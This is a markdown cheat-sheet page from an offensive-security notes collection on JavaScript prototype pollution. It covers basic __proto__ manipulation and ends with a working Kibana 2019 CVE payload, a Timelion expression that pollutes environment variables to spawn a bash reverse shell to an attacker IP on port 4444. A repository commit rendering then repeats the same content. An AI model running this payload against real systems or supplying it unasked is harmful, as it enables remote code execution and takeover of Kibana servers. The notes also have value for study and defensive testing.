killchain-compendium/Exploits/Web/Prototype Pollution JS.md

# Prototype Pollution

* Overwrite built in properties, like constructor, toString of an object.
* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
## Usage
* Access to prototype inside object, as an example Javascript
```javascript
obj.__proto__
Object.prototype
```
* Create object 
```javascript
let obj = {}
```
* Create properties inside `__proto__`.
```javascript
obj.__proto__.isAdmin = true
```

### Start Node commands
* Use 
    * `require`
    * `eval`

### Kibana CVE 2019
* Write reverse bash into variable
```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Prototype Pollution`

			`* Overwrite built in properties, like constructor, toString of an object.`
			* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
			`## Usage`
			`* Access to prototype inside object, as an example Javascript`
			```javascript
			`obj.__proto__`
			`Object.prototype`
			```
			`* Create object`
			```javascript
			`let obj = {}`
			```
			* Create properties inside `__proto__`.
			```javascript
			`obj.__proto__.isAdmin = true`
			```

			`### Start Node commands`
			`* Use`
			* `require`
			* `eval`

			`### Kibana CVE 2019`
			`* Write reverse bash into variable`
			```javascript
			`.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')`
			`.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')`
			```